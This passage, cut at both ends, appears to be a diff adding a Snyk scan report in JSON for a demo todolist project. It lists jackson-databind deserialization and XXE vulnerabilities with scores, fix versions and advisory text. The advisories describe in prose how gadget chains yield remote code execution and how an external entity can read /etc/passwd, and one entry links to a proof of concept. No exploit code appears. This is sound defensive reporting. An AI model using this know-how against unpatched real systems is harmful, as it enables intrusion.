Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n", + "epssDetails": { + "percentile": "0.77013", + "probability": "0.00519", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24750" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-09-18T13:46:28.613692Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-18T13:44:12Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-09-18T16:19:32Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.721313Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Srikanth Ramu", + "threedr3am'follower" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2658", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/pull/2864%23issuecomment-701026600", + "title": "GitHub PR" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:02:44.942188Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:55.201119Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n", + "epssDetails": { + "percentile": "0.75677", + "probability": "0.00464", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10650" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-11-29T12:43:11.601162Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-09-29T22:30:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-11-29T15:58:07.317638Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:52:55.201119Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "title": "XML External Entity (XXE) Injection", + "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "credit": [ + "Bartosz Baranowski" + ], + "semver": { + "vulnerable": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.6.7.4", + "2.9.10.7", + "2.10.5.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.2, + "functions": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ext/DOMSerializer.java", + "className": "DOMSerializer", + "functionName": "" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2589", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1887664", + "title": "RedHat Bugzilla Bug" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "medium", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "cvssV3BaseScore": 5.8, + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.2, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:03:31.367594Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:L/A:N", + "assigner": "SUSE", + "severity": "medium", + "baseScore": 5.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:41.313444Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:46.628614Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:14.249736Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n## Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n", + "epssDetails": { + "percentile": "0.68432", + "probability": "0.00275", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-25649" + ], + "CWE": [ + "CWE-611" + ], + "GHSA": [ + "GHSA-288c-cq4h-88gq" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-04T11:58:40.054903Z", + "functions_new": [ + { + "version": [ + "[2.6.0,2.6.7.4)", + "[2.9.0,2.9.10.7)", + "[2.10.0, 2.10.5.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ext.DOMSerializer", + "functionName": "" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-04T11:54:03Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-04T15:22:52Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:14.249736Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:42.491903Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.926544Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:26.923105Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35490" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:37:26.422837Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:32:48Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:26.923105Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2986", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.762302Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:38.975620Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:57.453912Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35491" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-18T11:40:53.658144Z", + "functions_new": [ + { + "version": [ + "[,2.10.0.pr1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-18T11:40:13Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-18T16:33:11Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:57.453912Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "credit": [ + "bu5yer" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2999", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Post" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-35728", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "SUSE", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:43.478254Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "SUSE", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:49:38.478896Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.576739Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.852735Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a 